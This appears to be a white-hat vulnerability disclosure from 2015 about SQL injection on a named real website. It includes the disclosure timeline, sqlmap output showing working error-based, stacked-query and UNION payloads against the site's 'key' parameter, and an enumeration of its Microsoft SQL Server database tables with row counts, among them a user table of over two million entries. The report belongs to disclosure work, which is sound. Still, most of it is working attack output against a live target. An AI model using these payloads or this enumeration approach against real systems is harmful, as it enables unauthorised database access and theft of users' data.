2015-11-23: Details have been reported to the vendor and are awaiting the vendor's handling
2015-11-27: The vendor has confirmed the issue; details are disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in the relevant field
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
http://www.fzjty.com/ProList.html?key=N
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: key=N%' AND 5624=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5624=5624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113))) AND '%'='

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: key=N%';WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: key=N%' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(117)+CHAR(77)+CHAR(84)+CHAR(109)+CHAR(70)+CHAR(100)+CHAR(121)+CHAR(97)+CHAR(108)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113)--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: ksshop2
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| dbo.UserNumInfo             | 2384686 |
| dbo.mobiler_code            |  298310 |
| dbo.SerialNumber            |  226323 |
| dbo.ViewProduct             |   84232 |
| dbo.UserNumberRunTime       |   61600 |
| dbo.Message                 |   25145 |
| dbo.CheckRecord             |   12530 |
| dbo.TbKeyWordMonitor        |   12241 |
| dbo.TbKeyWordMonitor        |   12241 |
| dbo.tb_orderitem            |   10399 |
| dbo.tb_orderitem            |   10399 |
| dbo.tb_area                 |    3149 |
| dbo.vi_area_all             |    3149 |
| dbo.User_Product            |    2718 |
| dbo.View_AreaUserProduct    |    2718 |
| dbo.CourseInfo              |    1522 |
| dbo.tb_ChinaTeacherOrders   |    1323 |
| dbo.Requestinfo_Product     |     853 |
| dbo.Requestinfo_Product     |     853 |
| dbo.tb_ExpProduct           |     828 |
| dbo.[ShoolStatistics ]      |     743 |
| dbo.tb_activeproduct        |     610 |
| dbo.tb_FavProduct           |     535 |
| dbo.tb_unitinfo             |     487 |
| dbo.vi_unitinfo_all         |     487 |
| dbo.vi_unitinfo_studentname |     487 |
| dbo.mobile_area             |     460 |
| dbo.tb_product              |     350 |
| dbo.teachinfo               |     350 |
| dbo.View_GradeName          |     350 |
| dbo.View_PackAge            |     350 |
| dbo.View_ProductUnion       |     350 |
| dbo.View_tb_product         |     350 |
| dbo.View_Teachinfo          |     350 |
| dbo.View_TypeName           |     350 |
| dbo.tb_city                 |     348 |
| dbo.SpecialPriceProduct     |     346 |
| dbo.SpecialPriceProduct     |     346 |
| dbo.tb_subjectclass         |     334 |
| dbo.tb_subjectclass         |     334 |
| dbo.AreaStatistics          |     306 |
| dbo.CategoryArea            |     209 |
| dbo.TbShoppingCart          |     185 |
| dbo.prodmodule              |     170 |
| dbo.BatchInformation        |     157 |
| dbo.tb_UserHelpQuestion     |     114 |
| dbo.tb_student              |      91 |
| dbo.vi_student_classes      |      91 |
| dbo.tb_righttree            |      84 |
| dbo.tb_unitclass            |      81 |
| dbo.vi_unitclass_name       |      81 |
| dbo.tb_idea                 |      74 |
| dbo.vi_teacher_unitclass    |      66 |
| dbo.tb_unitname             |      57 |
| dbo.tb_classes              |      40 |
| dbo.TbMenu                  |      40 |
| dbo.vi_class_school         |      40 |
| dbo.VersionFileName         |      36 |
| dbo.tb_province             |      34 |
| dbo.TbAdvertize             |      31 |
| dbo.tb_category             |      30 |
| dbo.tb_grade                |      30 |
| dbo.vi_category_all         |      30 |
| dbo.tb_company              |      27 |
| dbo.tb_knowledge            |      24 |
| dbo.tb_UserHelper           |      24 |
| dbo.tb_UserHelper           |      24 |
| dbo.tb_AdminHelper          |      20 |
| dbo.Package                 |      19 |
| dbo.tb_HyperLink            |      18 |
| dbo.Concern                 |      16 |
| dbo.tb_AdminHelpQuestion    |      15 |
| dbo.tb_announcement         |      14 |
| dbo.Gradearea               |      13 |
| dbo.tb_job                  |      13 |
| dbo.Type                    |      13 |
| dbo.tb_serverlnow           |      12 |
| dbo.tb_treeclass            |      11 |
| dbo.tb_treeclass            |      11 |
| dbo.tb_materialinfo         |      10 |
| dbo.vi_teacher_classes      |      10 |
| dbo.tb_contect              |       9 |
| dbo.ActiveRange             |       7 |
| dbo.dtproperties            |       7 |
| dbo.tb_Region               |       6 |
| dbo.TbLocation              |       6 |
| dbo.Promotion               |       5 |
| dbo.tb_manager              |       5 |
| dbo.tb_rightmanager         |       5 |
| dbo.tb_rightmanager         |       5 |
| dbo.tb_school               |       5 |
| dbo.tb_teachers             |       5 |
| dbo.Exp_Orde                |       4 |
| dbo.PresentType             |       4 |
| dbo.tb_payment              |       3 |
| dbo.VersionManage           |       3 |
| dbo.tb_deliver              |       2 |
| dbo.tb_knowcate             |       2 |
| dbo.tb_WareHouse            |       2 |
| dbo.ActiveInformation       |       1 |
| dbo.comments                |       1 |
| dbo.FreeFare                |       1 |
| dbo.ImageInfo               |       1 |
| dbo.tb_materialactive       |       1 |
| dbo.tb_materialschool       |       1 |
| dbo.TbProductAdvertize      |       1 |
| dbo.TbVisit                 |       1 |
+-----------------------------+---------+
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-11-27 09:07
Fix in progress, thank you.
None yet